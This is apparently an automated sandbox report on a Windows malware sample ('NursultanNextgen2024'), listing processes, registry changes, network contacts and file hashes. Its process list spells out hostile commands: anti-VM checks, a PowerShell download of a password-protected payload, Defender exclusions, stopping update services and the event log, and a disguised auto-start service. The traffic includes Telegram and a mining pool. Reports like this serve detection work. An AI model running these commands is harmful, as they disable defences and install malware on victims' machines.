| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\windows\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 3828 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4668 set thread context of 4980 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\conhost.exe |
| PID 4668 set thread context of 2188 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\svchost.exe |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsPower"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsPower"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\ProgramData\windows\powershell.exe
C:\ProgramData\windows\powershell.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.0.100:443 | get.geojs.io | tcp |
| US | 8.8.8.8:53 | 100.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:8888 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| DE | 95.179.241.203:8888 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\kdotlbBcbF.bat
| MD5 | 68f05d3d71ea50a777d0f47e0d78cac4 |
| SHA1 | 248b8b5174d224c004a10267502f2601083ce1d5 |
| SHA256 | b8a9ea85d4dc8dfe89ffcff5c4ae7c33032de98064d7b06905938f05e212ec07 |
| SHA512 | 225e95548435e43d90637cf7ef62252cabcafe94606f726c6f3e2858c82a264e72d22a3889d84a4111bf8a8954a10c306c54c14b6b4621d355f048fc35694dab |
memory/4056-47-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp
memory/4056-49-0x000002C39C7E0000-0x000002C39C802000-memory.dmp
memory/4056-50-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4056-51-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
memory/4056-54-0x000002C39CA90000-0x000002C39CB06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hc3sabh5.xkf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4056-72-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 37336a2069c23630c8deeba3c60a5ea3 |
| SHA1 | ed7a805a79ecf79d2479a6a9b0e61604dd7b6a28 |
| SHA256 | 57389f5f93b1fc16c2b4b047091a4b6f80c51f805799842fe152ce95a0ef38db |
| SHA512 | 8087467e753b5b47589fa35c577cc7cafd6c3406ef3521110718cfcc1705ef0b676335095016b74cebb99a83723ca7a64741e8ca3e11b2d172d3d2015d871c02 |
memory/4468-249-0x000001896FFE0000-0x000001897000A000-memory.dmp
memory/4468-268-0x000001896FFE0000-0x0000018970002000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f134b81e645d3ff8ff8bae5b72f6b4ab |
| SHA1 | 30d57ea765d7cbc632c90a115b23db9a3c93055f |
| SHA256 | e9b16760f2110783fd78f86836874575e34ed83dbb1fdef2b5c3e2aa32cf414a |
| SHA512 | dfcf8eebfbbf99c96cf37a9099a257dd11650d58e72e0201a598106aaafab6aa312da323fac6667a6092f0c1faa1e9fc3572ca875012902f211cec5ffa9d1fbd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a1fb90b3f33474d62a2d3cef79aa6301 |
| SHA1 | f1ca0362b0575a908adc19ec92b22c3b5be30a3f |
| SHA256 | 96a0b42939fe583d920430996b4dc18f3a475a2fa534a02c86ff6b9309e61068 |
| SHA512 | 0b312f78bf8effc86ea019f78e97340d4d8d71a7789813026e76b225892717b3de9b7a0aa1844072aefa6b45af7a3a4a7e6232c18f30a2fa4e63af61ca774c99 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d5ecd9138710fa9e254da38a936dc8a6 |
| SHA1 | c89fe5235f27ca9517fedca5aa4bca419aaff98c |
| SHA256 | c698ed5e40256e866801be707af25077f14b141202927a251a9509453b435416 |
| SHA512 | 672389b8f0583c86035c86712217025ec30baa78df423f65b13e098879963755c9508c1a3d4e4b6dbe5d27fdae2b971c6bd7935a84e226fe34f90732b28f37ad |
C:\Users\Admin\AppData\Local\Temp\Cache.rar
| MD5 | 6282b4c6aca3a1c55af6d1ed91d3c932 |
| SHA1 | cfb5bf824bbfd3ef9b49ef1f65c98f1f88c3a974 |
| SHA256 | a29cc0c6f3c244c8d257fa1ea5c10c463b4e26ef0f0ca010f0a917d7da69aee1 |
| SHA512 | 92ac2ec23c1dd38b8b2a76ab237e30a0dd873d23aa2aaf7856089d451a95beb632b1417deea28fb6fb98fcc025afc3efcd9679e8c2384c4eefd5abbe27de28d3 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
| MD5 | 643a8e965f3f1331c2902a2a451c5200 |
| SHA1 | 4a92181dc431a42e9a0c4aedb9df7c5b1b572173 |
| SHA256 | 61c29cf71d338ee070804f4ec0e60f93dd2056840c95c9497bb03cf81a590ad5 |
| SHA512 | 194f9c946d4d06bbe8a89999716024b79cd66df9da2c11e503cee216004e44fad01317229a84618a0cc406deb40ec7e23e1e53e23c426b2e6f2b3107e8f1baf1 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
| MD5 | acc0ec089c7623d1460d205a9e45a1d9 |
| SHA1 | 7abdb88df37e63cdaf4b6c99d2ec9c56d48815f8 |
| SHA256 | 169ab660aad03e63b1db2619e471ed8679a6975c7d1d23f639b1b052a62c80fc |
| SHA512 | 3201636fc8808dcf6683125555365dd0cbef25dfd5fe934c090eaf120107cee53a762a9ee0b2946f4feb1a74a7ee36a1daaae3187a15c278a2b00fc27b64c7e4 |
memory/3828-366-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3828-367-0x0000000004DB0000-0x0000000004E16000-memory.dmp
memory/3828-368-0x00000000056D0000-0x0000000005762000-memory.dmp
memory/3828-369-0x00000000067F0000-0x0000000006CEE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 463102aaa11412dce1fa4e6f5f58986f |
| SHA1 | 962bb55bda97f82875c9e2e3e9c9d5c93e77aed7 |
| SHA256 | 64354cc782f1b4d5aa45b416296ea0be23a164c4be716e0714f8c0ba9f0740b6 |
| SHA512 | 9cf6a0c7d7b9237bf1b4a7b7f3cbf549ba41bbcccbd409f7f27658789ecb49969aa808126d4bfb5410b19c1341297469a9a702877d5394a9de9ae9080193540d |
memory/4944-440-0x00000227AF510000-0x00000227AF52C000-memory.dmp
memory/4944-446-0x00000227AF6D0000-0x00000227AF789000-memory.dmp
memory/4944-479-0x00000227AF530000-0x00000227AF53A000-memory.dmp
memory/4980-574-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-577-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2188-578-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-585-0x0000021FDB350000-0x0000021FDB370000-memory.dmp
memory/2188-582-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-579-0x0000000140000000-0x0000000140848000-memory.dmp
memory/4980-573-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-572-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-571-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4980-570-0x0000000140000000-0x000000014000D000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 747d7ddd27f695f5e07df8ff9bc44e28 |
| SHA1 | c33048412255744c3de6292238eae196791be25e |
| SHA256 | 8dac7d9b38f2811c76652717c7f93c2a6390f031149ed850ae9ddb7dedcfca55 |
| SHA512 | ca85efa05980bba8ced81cb41a66e05821a2a55382142bffd27e8945a34d0ec89a6e221f0f5e381c877adc8d639863c9c837b74401f8096af5e9417580766ffa |
memory/2188-584-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-583-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-589-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-590-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-588-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-587-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-586-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-581-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-580-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-593-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2188-594-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
136s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
